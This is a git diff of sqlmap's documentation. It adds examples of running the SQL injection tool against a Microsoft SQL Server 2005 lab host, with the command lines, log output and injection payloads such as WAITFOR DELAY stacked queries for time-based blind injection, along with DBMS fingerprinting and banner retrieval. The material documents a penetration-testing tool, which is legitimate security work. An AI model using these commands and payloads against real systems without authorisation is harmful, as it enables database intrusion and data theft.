diff --git a/doc/ChangeLog b/doc/ChangeLog
index ec03ff2f6..6d9271075 100644
--- a/doc/ChangeLog
+++ b/doc/ChangeLog
@@ -36,8 +36,7 @@ sqlmap (0.6.3-1) stable; urgency=low
headers are set;
* Minor improvement to be able to provide CU (as current user) as user
value (-U) when enumerating users privileges or users passwords;
- * Minor improvements to sqlmap Debian package files: sqlmap uploaded
- to official Debian project repository, on queue at the moment;
+ * Minor improvements to sqlmap Debian package files;
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
library if available to speed up the sqlmap algorithmic operations;
* Minor improvement to retry the HTTP request up to three times in case
diff --git a/doc/README.html b/doc/README.html
index dc112907a..723fe96fe 100644
--- a/doc/README.html
+++ b/doc/README.html
@@ -1851,6 +1851,23 @@ stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+ --stacked-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
+stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
+
+
+
+
Test for Time based blind SQL injection
@@ -1901,6 +1918,25 @@ time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+ --time-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
+[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
+[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
+time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
+
+
+
+
Test for UNION query SQL injection
@@ -2289,6 +2325,29 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
+
+[...]
+[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:51] [INFO] testing Microsoft SQL Server
+[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
+[hh:mm:51] [INFO] retrieved: 1
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:51] [INFO] retrieved: 5
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+ html error message fingerprint: Microsoft SQL Server
+
+
+
+
If you want an even more accurate result, based also on banner parsing,
you can also provide the -b or --banner option.
@@ -2372,6 +2431,40 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
+
+[...]
+[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:03] [INFO] testing Microsoft SQL Server
+[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
+[hh:mm:03] [INFO] retrieved: 1
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:03] [INFO] retrieved: 5
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: @@VERSION
+[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
+ Oct 14 2005 00:33:37
+ Copyright (c) 1988-2005 Microsoft Corporation
+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+
+[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS operating system: Windows 2003 Service Pack 1
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+ banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
+ version 9.00.1399
+ html error message fingerprint: Microsoft SQL Server
+[...]
+
+
+
+
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
correctly identify the database management system patch level.
The Microsoft SQL Server XML versions file is the result of a sqlmap
@@ -2444,6 +2537,23 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
+
+banner:
+---
+Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
+ Oct 14 2005 00:33:37
+ Copyright (c) 1988-2005 Microsoft Corporation
+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+---
+
+
+
+
Current user
diff --git a/doc/README.pdf b/doc/README.pdf
index c26709d42..7d6b45333 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index fbb97d0e6..77042e507 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -1791,6 +1791,21 @@ back-end DBMS: PostgreSQL
stacked queries support: 'id=1; SELECT pg_sleep(5);-- AND 3128=3128'
+
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+ --stacked-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'name'
+stacked queries support: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'wRcBC'='wRcBC'
+
+
Test for Time based blind SQL injection
@@ -1839,6 +1854,23 @@ with stacked query syntax
time based blind sql injection payload: 'id=1; SELECT pg_sleep(5);-- AND 9644=9644'
+
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" \
+ --time-test -v 1
+
+[...]
+back-end DBMS: Microsoft SQL Server 2005
+
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with AND condition syntax
+[15:32:59] [WARNING] the parameter 'name' is not affected by a time based blind sql injection with AND condition syntax
+[15:32:59] [INFO] testing time based blind sql injection on parameter 'name' with stacked query syntax
+[15:33:13] [INFO] the parameter 'name' is affected by a time based blind sql injection with stacked query syntax
+time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';-- AND 'PmrXn'='PmrXn'
+
+
Test for UNION query SQL injection
@@ -2221,6 +2253,27 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
html error message fingerprint: Microsoft SQL Server
+
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
+
+[...]
+[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:51] [INFO] testing Microsoft SQL Server
+[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
+[hh:mm:51] [INFO] retrieved: 1
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:51] [INFO] retrieved: 5
+[hh:mm:51] [INFO] performed 13 queries in 0 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+ html error message fingerprint: Microsoft SQL Server
+
+
If you want an even more accurate result, based also on banner parsing,
you can also provide the -b or --banner option.
@@ -2302,6 +2355,38 @@ back-end DBMS: active fingerprint: Microsoft SQL Server 2000
[...]
+
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
+
+[...]
+[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
+[hh:mm:03] [INFO] testing Microsoft SQL Server
+[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
+[hh:mm:03] [INFO] retrieved: 1
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
+[hh:mm:03] [INFO] retrieved: 5
+[hh:mm:03] [INFO] performed 13 queries in 0 seconds
+[hh:mm:03] [INFO] query: @@VERSION
+[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
+ Oct 14 2005 00:33:37
+ Copyright (c) 1988-2005 Microsoft Corporation
+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+
+[hh:mm:15] [INFO] performed 1343 queries in 11 seconds
+web server operating system: Windows 2003 or 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS operating system: Windows 2003 Service Pack 1
+back-end DBMS: active fingerprint: Microsoft SQL Server 2005
+ banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0
+ version 9.00.1399
+ html error message fingerprint: Microsoft SQL Server
+[...]
+
+
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
correctly identify the database management system patch level.
@@ -2369,6 +2454,21 @@ Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
---
+
+Example on a Microsoft SQL Server 2005 Service Pack 0 target:
+
+
+$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 0 -b
+
+banner:
+---
+Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
+ Oct 14 2005 00:33:37
+ Copyright (c) 1988-2005 Microsoft Corporation
+ Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
+---
+
+
Current user